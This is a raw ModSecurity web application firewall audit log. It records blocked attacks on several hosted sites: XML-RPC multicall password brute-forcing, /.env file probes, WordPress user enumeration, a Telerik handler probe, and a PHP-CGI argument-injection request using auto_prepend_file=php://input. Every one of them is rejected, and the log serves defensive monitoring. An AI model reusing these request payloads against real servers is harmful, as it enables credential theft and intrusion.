system.multicallmethodNamewp.getUsersBlogsparamssolihin0solihin0 --3608241c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3608241c-E-- --3608241c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 162.144.127.41 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748091231683078 5809 (- - -) Stopwatch2: 1748091231683078 5809; combined=4230, p1=516, p2=3550, p3=0, p4=0, p5=97, sr=85, sw=67, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3608241c-Z-- --25aec27f-A-- [24/May/2025:19:54:22 +0700] aDHBfuunkxaVeh4Nwhbl0gAAAFg 103.236.140.4 57030 103.236.140.4 8181 --25aec27f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 116.212.142.179 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 116.212.142.179 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --25aec27f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --25aec27f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748091262173702 2796 (- - -) Stopwatch2: 1748091262173702 2796; combined=1324, p1=419, p2=876, p3=0, p4=0, p5=29, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --25aec27f-Z-- --479adf12-A-- [24/May/2025:20:12:59 +0700] aDHF2-O2UzDOKMmK0i6v_QAAAAk 103.236.140.4 57758 103.236.140.4 8181 --479adf12-B-- GET /.env HTTP/1.0 Host: wooin.epicgamer.org X-Real-IP: 64.225.75.246 X-Forwarded-Host: wooin.epicgamer.org X-Forwarded-Server: wooin.epicgamer.org X-Forwarded-For: 64.225.75.246 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --479adf12-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --479adf12-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748092379041345 708 (- - -) Stopwatch2: 1748092379041345 708; combined=267, p1=237, p2=0, p3=0, p4=0, p5=30, sr=59, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --479adf12-Z-- --66901401-A-- [24/May/2025:20:38:06 +0700] aDHLvuO2UzDOKMmK0i6wiAAAAAk 103.236.140.4 58902 103.236.140.4 8181 --66901401-B-- GET /.env HTTP/1.0 Host: archiexnz.chickenkiller.com X-Real-IP: 165.227.39.235 X-Forwarded-Host: archiexnz.chickenkiller.com X-Forwarded-Server: archiexnz.chickenkiller.com X-Forwarded-For: 165.227.39.235 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --66901401-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --66901401-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748093886975669 763 (- - -) Stopwatch2: 1748093886975669 763; combined=313, p1=282, p2=0, p3=0, p4=0, p5=31, sr=87, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --66901401-Z-- --30654116-A-- [24/May/2025:20:38:20 +0700] aDHLzOO2UzDOKMmK0i6wkAAAAAw 103.236.140.4 58932 103.236.140.4 8181 --30654116-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 50.6.205.26 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 50.6.205.26 X-Forwarded-Proto: https Connection: close Content-Length: 485 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --30654116-C-- system.multicallmethodNamewp.getUsersBlogsparamssolihinsolihin148 --30654116-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --30654116-E-- --30654116-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 50.6.205.26 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748093900731365 4232 (- - -) Stopwatch2: 1748093900731365 4232; combined=2858, p1=362, p2=2388, p3=0, p4=0, p5=64, sr=56, sw=44, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --30654116-Z-- --74483501-A-- [24/May/2025:20:38:47 +0700] aDHL5-O2UzDOKMmK0i6wlwAAAA0 103.236.140.4 58954 103.236.140.4 8181 --74483501-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 67.205.42.207 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 67.205.42.207 X-Forwarded-Proto: https Connection: close Content-Length: 486 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --74483501-C-- system.multicallmethodNamewp.getUsersBlogsparamssolihinsolihin1478 --74483501-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --74483501-E-- --74483501-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 67.205.42.207 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748093927874924 5881 (- - -) Stopwatch2: 1748093927874924 5881; combined=4188, p1=557, p2=3464, p3=0, p4=0, p5=99, sr=132, sw=68, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --74483501-Z-- --ee048637-A-- [24/May/2025:20:43:22 +0700] aDHM-uO2UzDOKMmK0i6wuQAAABI 103.236.140.4 59146 103.236.140.4 8181 --ee048637-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 50.6.205.26 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 50.6.205.26 X-Forwarded-Proto: https Connection: close Content-Length: 485 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --ee048637-C-- system.multicallmethodNamewp.getUsersBlogsparamssolihinsolihin1*# --ee048637-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ee048637-E-- --ee048637-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 50.6.205.26 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748094202907311 4724 (- - -) Stopwatch2: 1748094202907311 4724; combined=3601, p1=380, p2=3057, p3=0, p4=0, p5=95, sr=80, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ee048637-Z-- --c5fd7302-A-- [24/May/2025:20:45:25 +0700] aDHNdeO2UzDOKMmK0i6wygAAABE 103.236.140.4 59268 103.236.140.4 8181 --c5fd7302-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 67.205.42.207 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 67.205.42.207 X-Forwarded-Proto: https Connection: close Content-Length: 482 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --c5fd7302-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminantix4711 --c5fd7302-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c5fd7302-E-- --c5fd7302-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 67.205.42.207 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748094325932403 5362 (- - -) Stopwatch2: 1748094325932403 5362; combined=3778, p1=436, p2=3144, p3=0, p4=0, p5=119, sr=77, sw=79, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c5fd7302-Z-- --3871b477-A-- [24/May/2025:20:47:18 +0700] aDHN5uO2UzDOKMmK0i6w3gAAABc 103.236.140.4 59360 103.236.140.4 8181 --3871b477-B-- GET / HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 166.108.228.180 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 166.108.228.180 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16 Proxy-Connection: close --3871b477-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3871b477-H-- Message: Access denied with code 403 (phase 2). Matched phrase "/Proxy-Connection/" at TX:header_name. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "33"] [id "210740"] [rev "2"] [msg "COMODO WAF: HTTP header is restricted by policy||smkn22-jkt.sch.id|F|4"] [data "/Proxy-Connection/"] [severity "WARNING"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748094438166935 2753 (- - -) Stopwatch2: 1748094438166935 2753; combined=1023, p1=476, p2=514, p3=0, p4=0, p5=32, sr=99, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3871b477-Z-- --fcc61419-A-- [24/May/2025:20:47:21 +0700] aDHN6fmzt4abyoi_U9kPiAAAAII 103.236.140.4 59364 103.236.140.4 8181 --fcc61419-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 67.205.42.207 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 67.205.42.207 X-Forwarded-Proto: https Connection: close Content-Length: 480 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --fcc61419-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminantix68 --fcc61419-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fcc61419-E-- --fcc61419-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 67.205.42.207 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748094441982045 6171 (- - -) Stopwatch2: 1748094441982045 6171; combined=4383, p1=521, p2=3675, p3=0, p4=0, p5=111, sr=85, sw=76, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fcc61419-Z-- --c0e1a839-A-- [24/May/2025:21:03:17 +0700] aDHRpeO2UzDOKMmK0i6xWgAAAAs 103.236.140.4 59884 103.236.140.4 8181 --c0e1a839-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 162.241.253.132 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 162.241.253.132 X-Forwarded-Proto: https Connection: close Content-Length: 482 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --c0e1a839-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminantix0000 --c0e1a839-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c0e1a839-E-- --c0e1a839-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 162.241.253.132 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748095397148913 5789 (- - -) Stopwatch2: 1748095397148913 5789; combined=4083, p1=522, p2=3399, p3=0, p4=0, p5=96, sr=106, sw=66, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c0e1a839-Z-- --3df2b256-A-- [24/May/2025:21:05:34 +0700] aDHSLuunkxaVeh4NwhbmfwAAAEM 103.236.140.4 59930 103.236.140.4 8181 --3df2b256-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 200.60.15.51 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 200.60.15.51 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --3df2b256-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3df2b256-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748095534214187 13740 (- - -) Stopwatch2: 1748095534214187 13740; combined=22810, p1=447, p2=838, p3=0, p4=0, p5=10777, sr=75, sw=0, l=0, gc=10748 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3df2b256-Z-- --c1a12b1a-A-- [24/May/2025:21:08:19 +0700] aDHS0zvI5DIWBJ2mFG5d7gAAAMo 103.236.140.4 60106 103.236.140.4 8181 --c1a12b1a-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 27.147.138.186 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 27.147.138.186 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --c1a12b1a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c1a12b1a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748095699928475 2787 (- - -) Stopwatch2: 1748095699928475 2787; combined=1323, p1=443, p2=849, p3=0, p4=0, p5=31, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c1a12b1a-Z-- --5e1c944c-A-- [24/May/2025:21:09:10 +0700] aDHTBuO2UzDOKMmK0i6xgAAAAAk 103.236.140.4 60122 103.236.140.4 8181 --5e1c944c-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 162.240.70.125 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 162.240.70.125 X-Forwarded-Proto: https Connection: close Content-Length: 484 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --5e1c944c-C-- system.multicallmethodNamewp.getUsersBlogsparamssolihinantix1202 --5e1c944c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5e1c944c-E-- --5e1c944c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 162.240.70.125 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748095750290800 5744 (- - -) Stopwatch2: 1748095750290800 5744; combined=4088, p1=504, p2=3420, p3=0, p4=0, p5=97, sr=81, sw=67, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5e1c944c-Z-- --d569fe1a-A-- [24/May/2025:21:23:22 +0700] aDHWWuunkxaVeh4Nwhbm-wAAAEY 103.236.140.4 60500 103.236.140.4 8181 --d569fe1a-B-- POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 171.244.40.232 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 171.244.40.232 X-Forwarded-Proto: http Connection: close Content-Length: 221 Accept: */* Upgrade-Insecure-Requests: 1 User-Agent: Custom-AsyncHttpClient Content-Type: application/x-www-form-urlencoded --d569fe1a-C-- --d569fe1a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d569fe1a-E-- --d569fe1a-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748096602441627 3934 (- - -) Stopwatch2: 1748096602441627 3934; combined=2885, p1=429, p2=2424, p3=0, p4=0, p5=31, sr=79, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d569fe1a-Z-- --fa032835-A-- [24/May/2025:21:30:48 +0700] aDHYGDvI5DIWBJ2mFG5eEAAAANI 103.236.140.4 60792 103.236.140.4 8181 --fa032835-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 147.182.252.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 147.182.252.149 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --fa032835-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fa032835-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748097048051513 3264 (- - -) Stopwatch2: 1748097048051513 3264; combined=1434, p1=487, p2=913, p3=0, p4=0, p5=34, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fa032835-Z-- --0c5f5535-A-- [24/May/2025:21:39:20 +0700] aDHaGOunkxaVeh4NwhbnuQAAAEs 103.236.140.4 32912 103.236.140.4 8181 --0c5f5535-B-- GET /Telerik.Web.UI.WebResource.axd?type=rau HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.156.128.127 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.156.128.127 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Accept: */* --0c5f5535-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0c5f5535-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||103.236.140.4|F|2"] [data ".web.ui.webresource.axd"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748097560439138 3644 (- - -) Stopwatch2: 1748097560439138 3644; combined=1795, p1=501, p2=1257, p3=0, p4=0, p5=37, sr=85, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0c5f5535-Z-- --c0185117-A-- [24/May/2025:21:48:23 +0700] aDHcN-unkxaVeh4NwhboCQAAAEo 103.236.140.4 33412 103.236.140.4 8181 --c0185117-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 109.199.117.176 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: 